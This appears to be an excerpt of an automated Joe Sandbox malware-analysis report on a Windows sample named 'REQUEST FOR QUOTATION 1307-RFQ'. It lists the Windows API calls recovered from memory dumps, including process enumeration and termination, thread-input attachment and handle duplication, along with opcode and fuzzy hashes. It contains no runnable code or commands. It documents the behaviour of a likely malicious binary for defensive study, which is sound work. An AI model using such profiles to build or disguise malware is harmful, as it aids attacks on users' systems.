                                                                                                                                                                                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00460268,?,00000001), ref: 00461204
                                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 0046120B
                                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 0046121A
                                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0046122C
                                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461245
                                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461257
                                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 0046129C
                                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612B1
                                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612BC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2156557900-0
                                                                                                                                                                                                                              • Opcode ID: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                                                                                                                                                                                                                              • Instruction ID: 1e48a1bdefc3aaf7905b324a82868e76ea33fb60fcd143e126220ea2d996acdd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B31D275600208BFDB109F54EC98F6A37A9EF54315F1582BEFA00E62B0E7789D448B5E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Variant$ClearInit$_memset
                                                                                                                                                                                                                              • String ID: ,,I$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                              • API String ID: 2862541840-2080382077
                                                                                                                                                                                                                              • Opcode ID: ff95da20181f441a164f6629f45453e3d508d42e8a1a97fb14f9fa89a57037a5
                                                                                                                                                                                                                              • Instruction ID: ae80b45066e4f78fbd037e562a23a34cf658a5e22d7790f01f39a3ab0041c2b1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff95da20181f441a164f6629f45453e3d508d42e8a1a97fb14f9fa89a57037a5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62919E30A00205ABDF20DFA1C848FEFB7B8EF49714F10855EE909AB281D7789D05CBA4
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • EnumChildWindows.USER32(?,0045A439), ref: 0045A377
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ChildEnumWindows
                                                                                                                                                                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                              • API String ID: 3555792229-1603158881
                                                                                                                                                                                                                              • Opcode ID: ec1b2c5ef55112558705b1f2f9e35d7e0ecf4ffddfa086fd6d13dd20cc331da8
                                                                                                                                                                                                                              • Instruction ID: 7454df241f77d0b93e78cd2df6a08ba454d4c5e8e9c0a671585cc9aba64ec447
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec1b2c5ef55112558705b1f2f9e35d7e0ecf4ffddfa086fd6d13dd20cc331da8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA91BB70600505AADB08DF61C452BEEF774BF04305F54822FEC59A7242DB3969ADCB99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EB), ref: 00402EAE
                                                                                                                                                                                                                                • Part of subcall function 00401DB3: GetClientRect.USER32(?,?), ref: 00401DDC
                                                                                                                                                                                                                                • Part of subcall function 00401DB3: GetWindowRect.USER32(?,?), ref: 00401E1D
                                                                                                                                                                                                                                • Part of subcall function 00401DB3: ScreenToClient.USER32(?,?), ref: 00401E45
                                                                                                                                                                                                                              • GetDC.USER32 ref: 0043CD32
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0043CD45
                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0043CD53
                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0043CD68
                                                                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 0043CD70
                                                                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0043CDFB
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                              • String ID: U
                                                                                                                                                                                                                              • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                              • Opcode ID: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                                                                                                                                                                                                                              • Instruction ID: a06c30b2c7428a2a0e02ce49fef1101dc5652c1e0a779c9989b3b0b616dc9c80
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A71CB31400205DFCF219F64C884AAB3BB5FF48324F14567BFD55AA2A6C7389881DBA9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlDecodePointer.NTDLL(00000000), ref: 00B21A3E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DecodePointer
                                                                                                                                                                                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                              • API String ID: 3527080286-3064271455
                                                                                                                                                                                                                              • Opcode ID: 7723a1766d3cb03b7a19fdc5cc886d452620c44ffe173ac993f6d60061bfbdb5
                                                                                                                                                                                                                              • Instruction ID: b66b8a312144a66781b4aeb2560bd0e0b2dedfb503a002122747d43723baa3d7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7723a1766d3cb03b7a19fdc5cc886d452620c44ffe173ac993f6d60061bfbdb5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9251597590092ACBCB10DF6CF98C1ADBBF0FF6A310F6009D5D449BB254DB758A248B54
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0048F910), ref: 00478D28
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0048F910), ref: 00478D5C
                                                                                                                                                                                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00478ED6
                                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00478F00
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 560350794-0
                                                                                                                                                                                                                              • Opcode ID: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                                                                                                                                                                                                                              • Instruction ID: 5de9ffb64ca5e15a2b50b30bc9937a924b2564530b5861c8322637ebb6f06415
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4F12871A00109AFCB14DF94C888EEEB7B9FF49314F10846AF909AB251DB35AE46CB55
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
                                                                                                                                                                                                                                • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
                                                                                                                                                                                                                                • Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32
                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00464D40
                                                                                                                                                                                                                              • _wcscmp.LIBCMT ref: 00464D5A
                                                                                                                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00464D75
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 793581249-0
                                                                                                                                                                                                                              • Opcode ID: e5efdc4b7bed8b35d3c7756aed83619e761acd6f8ed92700794926c6f689935b
                                                                                                                                                                                                                              • Instruction ID: 3e0d64ecfe06201b2d7f4e4ce82b19db3d94e317acadfd9fd6841a38a6d3c077
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5efdc4b7bed8b35d3c7756aed83619e761acd6f8ed92700794926c6f689935b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D5164B25083459BCB24EFA1D8819DF73ECAF84354F40092FB289D3151EE79A589C76B
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004886FF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InvalidateRect
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 634782764-0
                                                                                                                                                                                                                              • Opcode ID: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                                                                                                                                                                                                                              • Instruction ID: 67c69bdd2abc2e43d0d58bc2ecba6baab6695951e18c15bee5b3ec72a7eaee37
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE519530500244BEDB20BB298C89F5E7B64EB05724FA0492FF911E62E1DF79A990DB5D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0043C2F7
                                                                                                                                                                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0043C319
                                                                                                                                                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0043C331
                                                                                                                                                                                                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0043C34F
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0043C370
                                                                                                                                                                                                                              • DestroyIcon.USER32(00000000), ref: 0043C37F
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0043C39C
                                                                                                                                                                                                                              • DestroyIcon.USER32(?), ref: 0043C3AB
                                                                                                                                                                                                                                • Part of subcall function 0048A4AF: DeleteObject.GDI32(00000000), ref: 0048A4E8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2819616528-0
                                                                                                                                                                                                                              • Opcode ID: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                                                                                                                                                                                                                              • Instruction ID: 8b5e312d24aa0fc7293d55633b028b71e285ae3fa30838bdc618f7a4141ee9b3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D516A74A00205AFDB20DF65CD85FAF3BB5EB58310F10452EF902A72D0D7B4A991DB68
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0045853C,00000B00,?,?), ref: 0045892A
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458931
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458946
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,0045853C,00000B00,?,?), ref: 0045894E
                                                                                                                                                                                                                              • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458951
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458961
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(0045853C,00000000,?,0045853C,00000B00,?,?), ref: 00458969
                                                                                                                                                                                                                              • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 0045896C
                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00458992,00000000,00000000,00000000), ref: 00458986
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1957940570-0
                                                                                                                                                                                                                              • Opcode ID: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                                                                                                                                                                                                                              • Instruction ID: 349ed70c1d76ccaf0bdfd0abb61d7988567b7a63eab8a905bd57cb3f4c4245c0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4801BBB5240308FFE710ABA5DC8DF6B7BACEB89711F508825FA05DB1A1CA759C14CB24
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00486E24
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 00486E38
                                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00486E52
                                                                                                                                                                                                                              • _wcscat.LIBCMT ref: 00486EAD
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00486EC4
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00486EF2
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageSend$Window_wcscat
                                                                                                                                                                                                                              • String ID: SysListView32
                                                                                                                                                                                                                              • API String ID: 307300125-78025650
                                                                                                                                                                                                                              • Opcode ID: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
                                                                                                                                                                                                                              • Instruction ID: cb01a20e413fb831c79b84d4e1a22deaf7a16da1e784ee9815b65cba95e2bd2f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6341A370A00308ABDB21AF64CC85BEF77F8EF08354F11082BF544A7291D6799D858B68
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00463C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00463C7A
                                                                                                                                                                                                                                • Part of subcall function 00463C55: Process32FirstW.KERNEL32(00000000,?), ref: 00463C88
                                                                                                                                                                                                                                • Part of subcall function 00463C55: CloseHandle.KERNEL32(00000000), ref: 00463D52
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9A4
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0047E9B7
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9E6
                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0047EA63
                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000), ref: 0047EA6E
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0047EAA3
                                                                                                                                                                                                                              Strings
